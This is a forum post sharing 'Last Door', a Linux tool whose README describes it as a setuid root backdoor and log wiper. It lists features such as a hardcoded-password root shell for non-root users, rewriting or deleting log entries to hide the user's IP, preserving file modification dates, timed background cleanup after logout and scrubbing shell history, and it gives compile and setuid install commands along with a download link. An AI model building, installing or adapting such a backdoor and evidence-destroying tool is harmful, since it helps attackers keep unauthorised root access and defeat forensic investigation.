Jump to content
Fi8sVrs

Last Door Log Wiper

Recommended Posts

  • Active Members
Posted

Last Door is a utility written to wipe specific entries in arbitrary log files and if setuid, will also execute arbitrary commands without logging any history.

README

 ___________
| |Linux
|<Last|Door>|Root-
| --------- |Backdoor
| O |&
| |Log-
| |Cleaner
|___________|~r0ng

Hackers2DevNull.blogspot.co.uk
(The user bears responsibility)

Release Dec 2012 -V1

For a full writeup of the program, please visit my blog, URL above.

[+] What is it?

It is a backdoor program which enables a non-root user to send root commands to system, and a log cleaner with several functions.

[+] Features?

- Hardcoded password, no prompt/blank screen unless correct password entered
- No need for user to SU prior to running
- Protection for virtual file systems
- All commands sent to system as root
- Log cleaner searches the file system for chosen strings, no finite log lists used
- Log cleaner options:
- Search string replace with new string (e.g. change your ip in the logs)
- Search string delete string
- Search string delete line
- Search string delete file contents
- Multi-string search/destroy at once
- Includes hidden files
- Maintains the file modified date despite making changes
- On running the log cleaner, the process is forked as a background daemon
- User sets timer prior to running so they can logout/exit, and it will clean up after you have gone.
- If you don't logout prior to the process starting, the file search process will be displayed
- If you do logout prior to the process starting this will allow your .bash_history to refresh
and be included in the search (shoud you want to delete your ./LastDoor command for example).
[+] Compile/use?

- gcc LastDoor.c -o LastDoor -Wall (all std libs used)
- cp LastDoor /bin/LastDoor (for example)
- chmod u+s /bin/LastDoor (set the s bit)

- non-rootuser:~# /bin/LastDoor (run!)

Download LastDoor.tar (40 KB)

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...